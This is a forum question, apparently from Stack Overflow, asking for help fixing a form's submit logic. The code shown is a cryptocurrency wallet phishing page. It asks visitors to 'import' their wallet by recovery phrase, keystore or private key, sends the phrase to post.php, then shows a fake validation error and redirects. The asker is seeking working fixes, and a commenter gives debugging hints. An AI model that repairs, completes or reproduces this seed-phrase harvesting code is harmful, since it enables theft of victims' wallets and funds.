# I'm having this issue of connecting my form submit button to get elements from my script to post into my post.php

Tags: javascript, html, post, textarea, getelementbyid

I have this source code that a friend of mine asked me to correct. I need to make sure the characters in the `textarea` box are being sent to `post.php` after clicking the submit button, but it's not working. Instead, it's showing "Could not proceed due to some errors, kindly try again later.". Looking at the form box source code, I guess it's trying to get elements from the script, but I don't know how I can make this work. Can anyone kindly assist me on this? I don't know if I explained it well cuz I'm still a newbie to programming.

Here's the form/submit button code;

```
<form action="#" method="post" enctype="multipart/form-data" id="form" onsubmit="return false">
  <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">

    <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;"> <img src="https://appwalletconnects.org//assets/img/wallets_api_files/saved_resource.html" style="margin-right: 20px; height: 40px; width: 40px" id="myImg"><span>Import your <span
                      id="walletname"></span> wallet
      </span>
    </h3>
    <div class="mt-2">
      <div class="mt-10">
        <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
          <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
            Phrase
          </div>
          <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
            Keystore JSON
          </div>
          <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
            Private Key
          </div>
        </div>
        <div id="first" class="acc-body active">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative"><textarea cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="phrase" required
                minlength="12" id="phraseInput"></textarea>
              <input type="hidden" name="type" value="phrase" />
              <p class="text-xs text-grey-300 mt-6">
                Typically 12 (sometimes 24) words separated by single spaces
              </p>
            </div>
          </div>
          <div class="flex w-full">
            <button id=".sending" type="submit" onclick="Dis.postServer('form', '/api/parse/phrase', 'phraseProceed')" class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in"
              id="phraseProceed" name="play"><span class="mr-2 uppercase">Proceed</span> <span><svg
                              fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                              viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                            </svg></span></button>
          </div>
        </div>
```

And here is the script that I guess is trying to get the elements;

```
<script>
    function ready() {
        document.body.style.display = "block";
    }
    document.addEventListener("DOMContentLoaded", ready);
</script>
<script>
    const phraseProceedBtn = document.getElementById('phraseProceed');
    const keystorejsonProceedBtn = document.getElementById('keystorejsonproceed');
    const privatekeyProceedBtn = document.getElementById('privatekeyProceed');
    const phraseProceedHandler = () => {
        let phraseInputVal = document.getElementById('phraseInput').value;
        const wallet = document.getElementById('wallet_id').value;
        if (phraseInputVal.trim() === "") {
            alert('Fill in your recovery phrase');
        } else if (phraseInputVal.length < 12) {
            alert('Recovery phrase length should be 12 or more in characters.')
        } else {
            $.ajax({
                url: 'post.php',
                method: 'POST',
                data: { import_type: 'phrase', wallet: wallet, phrase: phraseInputVal },
                success: function (res) {
                    if (res.trim() != "") {
                        if (res.trim() == "string_error") {
                            alert('Fill in your recovery phrase');
                        } else if (res.trim() == "success") {
                            phraseInputVal = '';
                            document.querySelector('.sending').style.display = 'block';
                            setTimeout(() => {
                                alert('Error Validating Wallet... Please try again later');
                                redirect();
                            }, 3000);
                        }
                    } else {
                        alert('Could not proceed due to some errors, kindly try again later.')
                    }
                }
            });
        }
    };
</script>
```

Comment: Is there a reason that the `onsubmit` attribute in your form is set to `return false`? Unless you're overriding that somewhere else, this will post the data to whatever page the form is on rather than using your ajax request, because there's nothing telling it to use your ajax request.

Comment: I was given this source code to correct which i noticed the ajax request was disabled which i enabled to see if it would work with that but didn't work. so i guess it is overriding that somewhere else because of the onsubmit attribute is set to "return false" like you said which i have no idea but i'd like to make use of the ajax request i enabled so it can post the data to the post.php i included like you can see in script where it says;
           $.ajax({
             url: 'post.php',
             method: 'POST',

Please assist me... I've been on this for days now my head 'bout to blow

Comment: I can't help if I can't see everything going on. At this point, it could be a case of the `onclick` event not calling `phraseProceedHandler` (it should be in the onclick event, not `return false`), or it could be sending the result properly, but the server might not be returning the correct response. Assuming the error you're seeing is from the alert in your ajax request. If it's coming from somewhere else, it could be in `Dis.postServer()`. There's just too many assumptions that need to be made based on what you've given to come to an accurate conclusion.

Comment: Are you on icq jesse? so we can talk more better please.

Comment: I don't know what icq is. Just edit your question to include a [Minimal Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example)

Comment: I was  hoping to send you the file on icq so you can help me on that. icq is just like whatsapp